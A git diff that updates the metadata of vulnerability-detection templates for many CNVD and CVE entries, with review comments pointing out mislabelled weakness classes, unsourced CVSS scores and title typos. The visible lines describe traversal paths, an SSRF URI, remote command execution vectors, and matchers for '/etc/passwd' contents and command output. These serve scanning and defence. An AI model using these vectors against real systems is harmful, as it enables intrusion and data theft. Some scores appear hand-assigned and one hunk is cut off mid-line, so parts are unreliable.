128 files changed, 317 insertions(+), 222 deletions(-) diff --git a/cnvd/2019/CNVD-2019-19299.yaml b/cnvd/2019/CNVD-2019-19299.yaml index 86ad86ae1f..114cc01a3b 100644 --- a/cnvd/2019/CNVD-2019-19299.yaml +++ b/cnvd/2019/CNVD-2019-19299.yaml @@ -1,12 +1,17 @@ id: CNVD-2019-19299 info: - name: Zhiyuan A8 Arbitrary File Write (RCE) + name: Zhiyuan A8 - Remote Code Execution author: daffainfo severity: critical + description: Zhiyuan A8 is susceptible to remote code execution because of an arbitrary file write issue. reference: - https://www.cxyzjd.com/article/guangying177/110177339 - https://github.com/sectestt/CNVD-2019-19299 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 tags: zhiyuan,cnvd,cnvd2019,rce requests: @@ -45,3 +50,5 @@ requests: - 'contains(body_1, "htmoffice operate")' - 'contains(body_2, "Windows IP")' condition: and + +# Enhanced by mp on 2022/05/12 diff --git a/cnvd/2019/CNVD-2019-32204.yaml b/cnvd/2019/CNVD-2019-32204.yaml index f85de55b08..ec365a5f8c 100644 --- a/cnvd/2019/CNVD-2019-32204.yaml +++ b/cnvd/2019/CNVD-2019-32204.yaml 
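Review bot: The added `cwe-id: CWE-77` (command injection) in CNVD-2019-19299.yaml does not match the added description, which attributes the code execution to an arbitrary file write; a file-write or upload weakness class such as CWE-434 would fit the stated root cause better, if that description is accurate. The same `classification` block (identical vector, `cvss-score: 10.0`, `CWE-77`) is added to CNVD-2019-32204, CNVD-2021-09650, CNVD-2021-26422 and CNVD-2022-03672 in this patch, and none of the references shown is a scoring source, so the values look hand-assigned rather than taken from an advisory. Tooling that triages on `cvss-score` and `cwe-id` will treat them as authoritative; consider citing where the score comes from, or leaving `classification` out where no published score exists.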
@@ -1,12 +1,16 @@ id: CNVD-2019-32204 info: - name: Fanwei e-cology <= 9.0 Remote Code Execution + name: Fanwei e-cology <=9.0 - Remote Code Execution author: daffainfo severity: critical - description: The attacker can directly execute arbitrary commands on the target server by invoking the unauthorized access problem interface in the BeanShell component. Currently, the security patch for this vulnerability has been released. Please take protective measures as soon as possible for users who use the Fanwei e-cology OA system. + description: Fanwei e-cology <=9.0 is susceptible to remote code execution vulnerabilities. Remote attackers can directly execute arbitrary commands on the target server by invoking the unauthorized access problem interface in the BeanShell component. Currently, the security patch for this vulnerability has been released. Please take protective measures as soon as possible for users who use the Fanwei e-cology OA system. reference: - https://blog.actorsfit.com/a?ID=01500-11a2f7e6-54b0-4a40-9a79-5c56dc6ebd51 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 tags: fanwei,cnvd,cnvd2019,rce requests: @@ -22,3 +26,5 @@ requests: - type: regex regex: - "root:.*:0:0:" + +# Enhanced by mp on 2022/05/12 diff --git a/cnvd/2020/CNVD-2020-62422.yaml b/cnvd/2020/CNVD-2020-62422.yaml index ba3c739d17..0194c6d8b8 100644 --- a/cnvd/2020/CNVD-2020-62422.yaml +++ b/cnvd/2020/CNVD-2020-62422.yaml @@ -1,7 +1,7 @@ id: CNVD-2020-62422 info: - name: Seeyon readfile(CNVD-2020-62422) + name: Seeyon - Arbitrary File Retrieval author: pikpikcu severity: medium reference: @@ -29,4 +29,4 @@ requests: part: body words: - "ctpDataSource.password" - condition: and \ No newline at end of file + condition: and diff --git a/cnvd/2020/CNVD-2020-68596.yaml b/cnvd/2020/CNVD-2020-68596.yaml index 8294f8519b..b1d96de058 100644 --- a/cnvd/2020/CNVD-2020-68596.yaml +++ b/cnvd/2020/CNVD-2020-68596.yaml 
@@ -1,11 +1,16 @@ id: CNVD-2020-68596 info: - name: WeiPHP 5.0 Path Traversal + name: WeiPHP 5.0 - Path Traversal author: pikpikcu - severity: critical + description: WeiPHP 5.0 is susceptible to directory traversal attacks. + severity: high reference: - http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.6 + cwe-id: CWE-22 tags: weiphp,lfi,cnvd,cnvd2020 requests: @@ -41,3 +46,5 @@ requests: - WeiPHP - DB_PREFIX condition: and + +# Enhanced by mp on 2022/05/12 diff --git a/cnvd/2021/CNVD-2021-01931.yaml b/cnvd/2021/CNVD-2021-01931.yaml index 40ff5da4f2..af7aa8ed08 100644 --- a/cnvd/2021/CNVD-2021-01931.yaml +++ b/cnvd/2021/CNVD-2021-01931.yaml @@ -1,7 +1,7 @@ id: CNVD-2021-01931 info: - name: Ruoyi Management System Arbitrary File Download + name: Ruoyi Management System - Arbitrary File Retrieval author: daffainfo,ritikchaddha severity: high reference: diff --git a/cnvd/2021/CNVD-2021-09650.yaml b/cnvd/2021/CNVD-2021-09650.yaml index 8c24b28302..528666e80d 100644 --- a/cnvd/2021/CNVD-2021-09650.yaml +++ b/cnvd/2021/CNVD-2021-09650.yaml @@ -1,11 +1,16 @@ id: CNVD-2021-09650 info: - name: Ruijie EWEB Gateway Platform Command Execution + name: Ruijie EWEB Gateway Platform - Remote Command Injection author: daffainfo severity: critical + description: Ruijie EWEB Gateway Platform is susceptible to remote command injection attacks. reference: - http://j0j0xsec.top/2021/04/22/%E9%94%90%E6%8D%B7EWEB%E7%BD%91%E5%85%B3%E5%B9%B3%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 tags: ruijie,cnvd,cnvd2021,rce requests: @@ -23,3 +28,5 @@ requests: name: http words: - "http" + +# Enhanced by mp on 2022/05/12 
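Review bot: In CNVD-2020-68596.yaml the new `description` line is inserted between `author` and `severity`, while the other templates visible in this patch keep the order `name`, `author`, `severity`, `description`; move it below `severity: high` so the info block stays uniform. The severity change from `critical` to `high` does agree with the added `cvss-score: 8.6`.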
diff --git a/cnvd/2021/CNVD-2021-26422.yaml b/cnvd/2021/CNVD-2021-26422.yaml index e159383415..8ceb9e5c8d 100644 --- a/cnvd/2021/CNVD-2021-26422.yaml +++ b/cnvd/2021/CNVD-2021-26422.yaml @@ -4,9 +4,14 @@ info: name: eYouMail - Remote Code Execution author: daffainfo severity: critical + description: eYouMail is susceptible to a remote code execution vulnerability. reference: - https://github.com/ltfafei/my_POC/blob/master/CNVD-2021-26422_eYouMail/CNVD-2021-26422_eYouMail_RCE_POC.py - https://github.com/EdgeSecurityTeam/Vulnerability/blob/main/%E4%BA%BF%E9%82%AE%E9%82%AE%E4%BB%B6%E7%B3%BB%E7%BB%9F%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20(CNVD-2021-26422).md + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 tags: eyoumail,rce,cnvd,cnvd2021 requests: @@ -27,3 +32,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/05/12 diff --git a/cnvd/2021/CNVD-2021-28277.yaml b/cnvd/2021/CNVD-2021-28277.yaml index 5be02217e6..1277253402 100644 --- a/cnvd/2021/CNVD-2021-28277.yaml +++ b/cnvd/2021/CNVD-2021-28277.yaml @@ -1,7 +1,7 @@ id: CNVD-2021-28277 info: - name: Landray-OA Arbitrary File Download + name: Landray-OA Arbitrary - Arbitrary File Retrieval author: pikpikcu,daffainfo severity: high reference: @@ -41,4 +41,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/cnvd/2022/CNVD-2022-03672.yaml b/cnvd/2022/CNVD-2022-03672.yaml index 400f7dc2ad..b3e9de9132 100644 --- a/cnvd/2022/CNVD-2022-03672.yaml +++ b/cnvd/2022/CNVD-2022-03672.yaml 
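Review bot: The new name in CNVD-2021-28277.yaml reads `Landray-OA Arbitrary - Arbitrary File Retrieval`, with a leftover `Arbitrary` before the separator; it should be `name: Landray-OA - Arbitrary File Retrieval`. The info block visible in the hunk goes from `severity` straight to `reference`, so this template still has no `description`, unlike the CNVD entries in this patch that received one.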
@@ -1,14 +1,19 @@ id: CNVD-2022-03672 info: - name: Sunflower Simple and Personal edition RCE + name: Sunflower Simple and Personal - Remote Code Execution author: daffainfo severity: critical + description: Sunflower Simple and Personal is susceptible to a remote code execution vulnerability. reference: - https://www.1024sou.com/article/741374.html - https://copyfuture.com/blogs-details/202202192249158884 - https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270 - https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 tags: cnvd,cnvd2020,sunflower,rce requests: @@ -40,3 +45,5 @@ requests: - "contains(body_1, 'verify_string')" - "contains(body_2, 'Windows IP')" condition: and + +# Enhanced by mp on 2022/05/12 diff --git a/cves/2007/CVE-2007-4504.yaml b/cves/2007/CVE-2007-4504.yaml index 1f7016cd9f..44ac9a5200 100644 --- a/cves/2007/CVE-2007-4504.yaml +++ b/cves/2007/CVE-2007-4504.yaml @@ -1,10 +1,10 @@ id: CVE-2007-4504 info: - name: Joomla! Component RSfiles 1.0.2 - 'path' File Download + name: Joomla! Component RSfiles <=1.0.2 - Arbitrary File Retrieval author: daffainfo severity: high - description: Directory traversal vulnerability in index.php in the RSfiles component (com_rsfiles) 1.0.2 and earlier for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter in a files.display action. + description: An arbitrary file retrieval vulnerability in index.php in the RSfiles component (com_rsfiles) <=1.0.2 for Joomla! allows remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action. reference: - https://www.exploit-db.com/exploits/4307 - https://www.cvedetails.com/cve/CVE-2007-4504 diff --git a/cves/2010/CVE-2010-0696.yaml b/cves/2010/CVE-2010-0696.yaml index a73a43ea84..011cddc99d 100644 --- a/cves/2010/CVE-2010-0696.yaml +++ b/cves/2010/CVE-2010-0696.yaml 
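Review bot: The context line `tags: cnvd,cnvd2020,sunflower,rce` in CNVD-2022-03672.yaml does not match the template id `CNVD-2022-03672`, and this edit of the info block leaves it as it is. Anyone selecting templates by year tag will miss this one under `cnvd2022`. Change the line to `tags: cnvd,cnvd2022,sunflower,rce`.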
@@ -1,7 +1,7 @@ id: CVE-2010-0696 info: - name: Joomla! Component Jw_allVideos - Arbitrary File Download + name: Joomla! Component Jw_allVideos - Arbitrary File Retrieval author: daffainfo severity: high description: A directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter. @@ -25,4 +25,5 @@ requests: - type: status status: - 200 + # Enhanced by mp on 2022/02/13 diff --git a/cves/2010/CVE-2010-2122.yaml b/cves/2010/CVE-2010-2122.yaml index 2042183974..ed2f24987f 100644 --- a/cves/2010/CVE-2010-2122.yaml +++ b/cves/2010/CVE-2010-2122.yaml @@ -1,10 +1,10 @@ id: CVE-2010-2122 info: - name: Joomla! Component simpledownload 0.9.5 - Local File Disclosure + name: Joomla! Component simpledownload <=0.9.5 - Arbitrary File Retrieval author: daffainfo severity: high - description: A directory traversal vulnerability in the SimpleDownload (com_simpledownload) component before 0.9.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the SimpleDownload (com_simpledownload) component before 0.9.6 for Joomla! allows remote attackers to retrieve arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12623 - https://www.cvedetails.com/cve/CVE-2010-2122 diff --git a/cves/2010/CVE-2010-3203.yaml b/cves/2010/CVE-2010-3203.yaml index 4c7856343b..8ab1009b02 100644 --- a/cves/2010/CVE-2010-3203.yaml +++ b/cves/2010/CVE-2010-3203.yaml 
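Review bot: The rewritten description of CVE-2010-2122 changes the stated impact from `include and execute arbitrary local files` to `retrieve arbitrary files`, which is a weaker claim than the text it replaces, while `severity: high` stays the same. If the removed wording reflects the advisory, keep the execution impact in the description (`... allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.`) and choose the new name to match. A reader triaging on the description alone would otherwise under-rate the finding.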
@@ -1,7 +1,7 @@ id: CVE-2010-3203 info: - name: Joomla! Component PicSell 1.0 - Local File Disclosure + name: Joomla! Component PicSell 1.0 - Arbitrary File Retrieval author: daffainfo severity: high description: A directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php. diff --git a/cves/2015/CVE-2015-4694.yaml b/cves/2015/CVE-2015-4694.yaml index f2e7c8e099..f116177a76 100644 --- a/cves/2015/CVE-2015-4694.yaml +++ b/cves/2015/CVE-2015-4694.yaml @@ -1,10 +1,10 @@ id: CVE-2015-4694 info: - name: WordPress Zip Attachments <= 1.1.4 - Arbitrary File Download + name: WordPress Zip Attachments <= 1.1.4 - Arbitrary File Retrieval author: 0x_Akoko severity: high - description: WordPress zip-attachments plugin allows arbitrary file downloads because it does not check the download path of the requested file. + description: WordPress zip-attachments plugin allows arbitrary file retrieval as it does not check the download path of the requested file. reference: - https://wordpress.org/plugins/zip-attachments/#developers - https://wpscan.com/vulnerability/8047 diff --git a/cves/2017/CVE-2017-11512.yaml b/cves/2017/CVE-2017-11512.yaml index 279dc4e183..d5a5f7edbf 100644 --- a/cves/2017/CVE-2017-11512.yaml +++ b/cves/2017/CVE-2017-11512.yaml 
@@ -1,11 +1,11 @@ id: CVE-2017-11512 info: - name: ManageEngine ServiceDesk - Unauthenticated Arbitrary File Download + name: ManageEngine ServiceDesk - Arbitrary File Retrieval author: 0x_Akoko severity: high description: | - The ManageEngine ServiceDesk 9.3.9328 is vulnerable to arbitrary file downloads due to improper restrictions of the pathname used in the name parameter for the download-snapshot URL. An unauthenticated remote attacker can use this vulnerability to download arbitrary files. + The ManageEngine ServiceDesk 9.3.9328 is vulnerable to an arbitrary file retrieval due to improper restrictions of the pathname used in the name parameter for the download-snapshot path. An unauthenticated remote attacker can use this vulnerability to download arbitrary files. reference: - https://exploit.kitploit.com/2017/11/manageengine-servicedesk-cve-2017-11512.html - https://www.cvedetails.com/cve/CVE-2017-11512 diff --git a/cves/2017/CVE-2017-15363.yaml b/cves/2017/CVE-2017-15363.yaml index 4349f108ff..1118798c3b 100644 --- a/cves/2017/CVE-2017-15363.yaml +++ b/cves/2017/CVE-2017-15363.yaml @@ -1,7 +1,7 @@ id: CVE-2017-15363 info: - name: Typo3 Restler Extension - Local File Disclosure + name: TYPO3 Restler - Arbitrary File Retrieval author: 0x_Akoko severity: high description: Directory traversal vulnerability in public/examples/resources/getsource.php in Luracast Restler through 3.0.0, as used in the restler extension before 1.7.1 for TYPO3, allows remote attackers to read arbitrary files via the file parameter. diff --git a/cves/2017/CVE-2017-7269.yaml b/cves/2017/CVE-2017-7269.yaml index d7bda567cc..c3897f688a 100644 --- a/cves/2017/CVE-2017-7269.yaml +++ b/cves/2017/CVE-2017-7269.yaml 
@@ -5,7 +5,7 @@ info: author: thomas_from_offensity,geeknik severity: critical description: | - Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 contains a buffer overflow vulnearbility in the ScStoragePathFromUrl function in the WebDAV service that could allow remote attackers to execute arbitrary code via a long header beginning with "If " + +# Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-1000861.yaml b/cves/2018/CVE-2018-1000861.yaml index d5d14211b8..8194ae8495 100644 --- a/cves/2018/CVE-2018-1000861.yaml +++ b/cves/2018/CVE-2018-1000861.yaml @@ -1,13 +1,13 @@ id: CVE-2018-1000861 info: - name: Jenkins 2.138 Remote Command Execution + name: Jenkins - Remote Command Injection author: dhiyaneshDK,pikpikcu severity: critical - description: A code execution vulnerability exists in the Stapler web framework used by Jenkins 2.153 and earlier, LTS 2.138.3 and earlier in stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java that allows - attackers to invoke some methods on Java objects by accessing crafted URLs that were not intended to be invoked this way. + description: Jenkins 2.153 and earlier and LTS 2.138.3 and earlier are susceptible to a remote command injection via stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java that allows attackers to invoke some methods on Java objects by accessing crafted URLs that were not intended to be invoked this way. reference: - https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861 + - https://nvd.nist.gov/vuln/detail/CVE-2018-1000861 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -31,3 +31,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-10562.yaml b/cves/2018/CVE-2018-10562.yaml index 469063f4ce..b66f95704a 100644 --- a/cves/2018/CVE-2018-10562.yaml +++ b/cves/2018/CVE-2018-10562.yaml 
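Review bot: The new `name` and the first clause of `description` in cves/2018/CVE-2018-1000861.yaml relabel the issue as "Remote Command Injection", but the rest of the description still describes attackers invoking methods on Java objects through crafted URLs handled by Stapler. That is code execution through unintended method dispatch, not injection into an OS command, so the title and the text now disagree on the weakness class. The rename also drops the affected-version bound from the title. I would keep the original class and carry the bound the description gives, e.g. `name: Jenkins <=2.153 - Remote Code Execution`, so triage does not file this as an OS command injection finding.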
@@ -1,10 +1,10 @@ id: CVE-2018-10562 info: - name: Dasan GPON Devices - Remote Code Execution (Unauthenticated) + name: Dasan GPON Devices - Remote Code Execution author: gy741 severity: critical - description: An issue was discovered on Dasan GPON home routers. Command Injection can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping + description: Dasan GPON home routers are susceptible to command injection which can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output. reference: - https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router @@ -37,3 +37,5 @@ requests: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" + +# Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-12031.yaml b/cves/2018/CVE-2018-12031.yaml index 6be7ac0dd7..4e98b1fb1d 100644 --- a/cves/2018/CVE-2018-12031.yaml +++ b/cves/2018/CVE-2018-12031.yaml 
@@ -4,11 +4,11 @@ info: name: Eaton Intelligent Power Manager 1.6 - Directory Traversal author: daffainfo severity: critical - description: Local file inclusion in Eaton Intelligent Power Manager v1.6 allows an attacker to include a file, it can lead to sensitive information disclosure, denial of service and code execution. + description: Eaton Intelligent Power Manager v1.6 allows an attacker to include a file via directory traversal, which can lead to sensitive information disclosure, denial of service and code execution. reference: - https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion - - https://nvd.nist.gov/vuln/detail/CVE-2018-12031 - https://www.exploit-db.com/exploits/48614 + - https://nvd.nist.gov/vuln/detail/CVE-2018-12031 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -33,3 +33,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-1207.yaml b/cves/2018/CVE-2018-1207.yaml index 0bbeab8144..62b9881bd4 100644 --- a/cves/2018/CVE-2018-1207.yaml +++ b/cves/2018/CVE-2018-1207.yaml 
@@ -1,19 +1,17 @@ id: CVE-2018-1207 info: - name: Dell iDRAC7 and iDRAC8 Devices Code Injection/RCE + name: Dell iDRAC7/8 Devices - Remote Code Injection author: dwisiswant0 severity: critical description: | - This template supports the detection part only. - - Dell EMC iDRAC7/iDRAC8, versions prior to 2.52.52.52, contain CGI injection vulnerability + Dell EMC iDRAC7/iDRAC8, versions prior to 2.52.52.52, contain a CGI injection vulnerability which could be used to execute remote code. A remote unauthenticated attacker may potentially be able to use CGI variables to execute remote code. - - https://github.com/KraudSecurity/Exploits/blob/master/CVE-2018-1207/CVE-2018-1207.py reference: - https://downloads.dell.com/solutions/dell-management-solution-resources/iDRAC_CVE%201207_1211_1000116.pdf + - https://github.com/KraudSecurity/Exploits/blob/master/CVE-2018-1207/CVE-2018-1207.py + - https://nvd.nist.gov/vuln/detail/CVE-2018-1207 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -30,3 +28,5 @@ requests: words: - "calling init: /lib/" part: response + +# Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-12300.yaml b/cves/2018/CVE-2018-12300.yaml index 90ff0b0135..53736ed55a 100644 --- a/cves/2018/CVE-2018-12300.yaml +++ b/cves/2018/CVE-2018-12300.yaml @@ -1,7 +1,7 @@ id: CVE-2018-12300 info: - name: Seagate NAS OS 4.3.15.1 - Open redirect + name: Seagate NAS OS 4.3.15.1 - Open Redirect author: 0x_Akoko severity: medium description: Arbitrary Redirect in echo-server.html in Seagate NAS OS version 4.3.15.1 allows attackers to disclose information in the Referer header via the 'state' URL parameter. diff --git a/cves/2018/CVE-2018-12634.yaml b/cves/2018/CVE-2018-12634.yaml index c70ccfedb9..edc2910da7 100644 --- a/cves/2018/CVE-2018-12634.yaml +++ b/cves/2018/CVE-2018-12634.yaml 
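Review bot: The rewritten `description` in cves/2018/CVE-2018-1207.yaml drops the sentence "This template supports the detection part only.", which was the only statement telling an operator that the check stops short of running code on the target. Moving the exploit link into `reference` is fine, but that scoping statement matters to anyone deciding whether the template is acceptable to run against production management controllers. I would keep it as a comment above `requests:`, e.g. `# Detection only: the matcher looks for "calling init: /lib/" in the response.` The request itself lies outside this hunk, so the wording should be confirmed against it.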
@@ -1,12 +1,13 @@ id: CVE-2018-12634 info: - name: Exposed CirCarLife System Log + name: CirCarLife Scada <4.3 - System Log Exposure author: geeknik severity: critical - description: CirCarLife is an internet-connected electric vehicle charging station + description: CirCarLife Scada before 4.3 allows remote attackers to obtain sensitive information via a direct request for the html/log or services/system/info.html URI. CirCarLife is an internet-connected electric vehicle charging station. reference: - https://circontrol.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2018-12634 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -33,3 +34,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-1273.yaml b/cves/2018/CVE-2018-1273.yaml index 8e19b457a9..657424e411 100644 --- a/cves/2018/CVE-2018-1273.yaml +++ b/cves/2018/CVE-2018-1273.yaml @@ -1,7 +1,7 @@ id: CVE-2018-1273 info: - name: Spring Data Commons Unauthenticated RCE + name: Spring Data Commons - Remote Code Execution author: dwisiswant0 severity: critical description: | @@ -42,3 +42,5 @@ requests: - "\\[(font|extension|file)s\\]" condition: or part: body + +# Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-13379.yaml b/cves/2018/CVE-2018-13379.yaml index 0091d7ef30..3ad6d6e608 100644 --- a/cves/2018/CVE-2018-13379.yaml +++ b/cves/2018/CVE-2018-13379.yaml 
@@ -1,14 +1,14 @@ id: CVE-2018-13379 info: - name: FortiOS - Credentials Disclosure + name: Fortinet FortiOS - Credentials Disclosure author: organiccrap severity: critical - description: An Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal") in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 - to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests. + description: Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests due to improper limitation of a pathname to a restricted directory (path traversal). reference: - https://fortiguard.com/advisory/FG-IR-18-384 - https://www.fortiguard.com/psirt/FG-IR-20-233 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -24,3 +24,5 @@ requests: - type: word words: - "var fgt_lang" + +# Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-13980.yaml b/cves/2018/CVE-2018-13980.yaml index 5f74b55601..9d12a07112 100644 --- a/cves/2018/CVE-2018-13980.yaml +++ b/cves/2018/CVE-2018-13980.yaml @@ -1,7 +1,7 @@ id: CVE-2018-13980 info: - name: Zeta Producer Desktop CMS 14.2.0 - Local File Disclosure + name: Zeta Producer Desktop CMS 14.2.0 - Arbitrary File Retrieval author: wisnupramoedya severity: medium description: The websites that were built from Zeta Producer Desktop CMS before 14.2.1 are vulnerable to unauthenticated file disclosure if the plugin "filebrowser" is installed, because of assets/php/filebrowser/filebrowser.main.php?file=../ directory traversal. 
diff --git a/cves/2018/CVE-2018-14064.yaml b/cves/2018/CVE-2018-14064.yaml index 50015d4823..d8cf45f3a7 100644 --- a/cves/2018/CVE-2018-14064.yaml +++ b/cves/2018/CVE-2018-14064.yaml @@ -4,7 +4,7 @@ info: name: VelotiSmart Wifi - Directory Traversal author: 0x_Akoko severity: critical - description: The uc-http service 1.0.0 on VelotiSmart WiFi B-380 camera devices allows Directory Traversal, as demonstrated by /../../etc/passwd on TCP port 80. + description: VelotiSmart WiFi B-380 camera devices allow directory traversal via the uc-http service 1.0.0, as demonstrated by /../../etc/passwd on TCP port 80. reference: - https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac - https://www.exploit-db.com/exploits/45030 @@ -31,3 +31,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-14916.yaml b/cves/2018/CVE-2018-14916.yaml index 95da4dba55..e4673b98bb 100644 --- a/cves/2018/CVE-2018-14916.yaml +++ b/cves/2018/CVE-2018-14916.yaml @@ -1,10 +1,10 @@ id: CVE-2018-14916 info: - name: Loytec LGATE-902 Directory Traversal + name: Loytec LGATE-902 <6.4.2 - Local File Inclusion author: 0x_Akoko severity: critical - description: Loytec LGATE-902 versions prior to 6.4.2 suffer from cross site scripting, arbitrary file deletion, and directory traversal vulnerabilities. + description: Loytec LGATE-902 versions prior to 6.4.2 suffers from a local file inclusion vulnerability. reference: - https://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html - https://nvd.nist.gov/vuln/detail/CVE-2018-14916 @@ -30,3 +30,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-15517.yaml b/cves/2018/CVE-2018-15517.yaml index c3c291ce89..08b7fb93d4 100644 --- a/cves/2018/CVE-2018-15517.yaml +++ b/cves/2018/CVE-2018-15517.yaml 
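Review bot: The new `name` and `description` in cves/2018/CVE-2018-14916.yaml reclassify the finding from directory traversal to local file inclusion. They also delete the cross-site scripting and arbitrary file deletion issues, which both the removed text and the packetstorm reference (`...XSS-Traversal-File-Deletion.html`) list. Inclusion implies the server evaluates the file, and nothing in the visible lines shows that. I would keep the title as `name: Loytec LGATE-902 <6.4.2 - Directory Traversal` and end the original description with `; this template checks the directory traversal.` instead of narrowing it to one class. The request and matchers are outside the hunk, so that last clause should be confirmed against them.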
@@ -1,10 +1,10 @@ id: CVE-2018-15517 info: - name: D-LINK Central WifiManager Server-Side Request Forgery + name: D-Link Central WifiManager - Server-Side Request Forgery author: gy741 severity: high - description: D-LINK Central WifiManager is susceptible to server-side request forgery. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP + description: D-Link Central WifiManager is susceptible to server-side request forgery. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using a browser. reference: diff --git a/cves/2018/CVE-2018-16167.yaml b/cves/2018/CVE-2018-16167.yaml index 079592a817..926b4dd68b 100644 --- a/cves/2018/CVE-2018-16167.yaml +++ b/cves/2018/CVE-2018-16167.yaml @@ -1,7 +1,7 @@ id: CVE-2018-16167 info: - name: LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated) + name: LogonTracer <=1.2.0 - Remote Command Injection author: gy741 severity: critical description: LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors. @@ -30,3 +30,5 @@ requests: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" + +# Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-16763.yaml b/cves/2018/CVE-2018-16763.yaml index 07e5d545ba..d12fec7ba7 100644 --- a/cves/2018/CVE-2018-16763.yaml +++ b/cves/2018/CVE-2018-16763.yaml 
